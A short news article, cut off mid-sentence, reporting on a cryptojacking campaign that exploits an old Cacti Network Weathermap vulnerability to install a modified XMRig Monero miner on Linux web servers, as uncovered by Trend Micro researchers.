Video: Using GitHub cloak, malware masterminds finetune cryptojacking code
Hackers are using a five-year-old security vulnerability to infect Linux servers with cryptocurrency-mining malware.
The cryptojacking campaign exploits CVE-2013-2618, an old vulnerability in Cacti's Network Weathermap plug-in, an open source tool which is used by network administrators to visualise network activity.
Uncovered by researchers at Trend Micro, the campaign is still active and is targeting publicly accessible x86-64 Linux web servers around the world, with the highest proportion of targets in Japan, Taiwan, China, and the US.
The attackers use the exploit to request to view the code on the server, with the flaw enabling them to alter the code to install a coin miner on the system.
The process runs every three minutes, in order to ensure that if it is somehow shutdown, the server will soon restart the mining process.
The miner itself is a modified XMRig tool, a legitimate, open-source Monero miner, which has been instructed to secretly perform its actions for the benefit of the attackers. Those behind it can even alter the maximum CPU usage of the miner, should they wish to lower the percentage of power used in order to reduce the chances of their activity being noticed.
Researchers uncovered some of the wallets, and say